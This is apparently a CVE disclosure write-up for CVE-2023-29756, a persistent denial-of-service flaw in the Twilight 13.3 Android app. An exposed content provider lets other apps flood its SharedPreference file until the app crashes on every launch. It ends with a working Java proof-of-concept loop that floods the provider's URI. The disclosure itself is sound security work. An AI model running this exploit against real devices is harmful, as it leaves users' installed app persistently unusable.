Headline
CVE-2023-29756: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.
Denial of Service exists in Twilight(CVE-2023-29756)
Vendor: Twilight(http://twilight.urbandroid.org/)
Affected product: Twilight(com.urbandroid.lux)
Version: 13.3
Download link: https://play.google.com/store/apps/details?id=com.urbandroid.lux
Description of the vulnerability for use in the CVE:An issue found in Twilight v.13.3 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.
Additional information: The Twilight application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.
poc:
ContentResolver contentResolver = getApplicationContext().getContentResolver(); Uri parse = Uri.parse(“content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE_AUTHORITY/a/a”); while(true){ ContentValues contentValues = new ContentValues(); String string = getRandomString(10000); contentValues.put(string,string); contentResolver.insert(parse,contentValues); }